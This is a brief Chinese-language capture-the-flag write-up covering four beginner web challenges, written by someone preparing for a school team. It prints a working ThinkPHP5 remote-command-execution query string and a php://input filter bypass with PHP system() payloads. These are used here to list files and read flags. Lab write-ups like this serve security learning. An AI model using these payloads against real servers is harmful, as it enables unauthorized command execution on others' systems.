- 想打进校队 感觉实力不够 最近复习一下 聊以自慰
baby_web
- 题目有提示 想想初始页面有哪个
- 访问的时候直接给你的是1.php页面
- 重新访问index.php
- 响应头里面有flag
Training-WWW-Robots
- 不多说 这个目的就是学习爬虫协议
- 直接访问/Robots.txt
- 直接给了flag文件
- 访问就行了
php_rce
- thinkphp5 rce漏洞解析
- 直接利用这个进行命令执行
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
??s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
- 获取flag 这道题放到第三题属实困难了
Web_php_include
- php伪协议的利用
- ?page=phP://input 绕过strstr的过滤
- 接着就是Hackbar上传
<?php system('ls ./'); ?>
<?php system('cat ./fl4gisisish3r3.php'); ?>
- over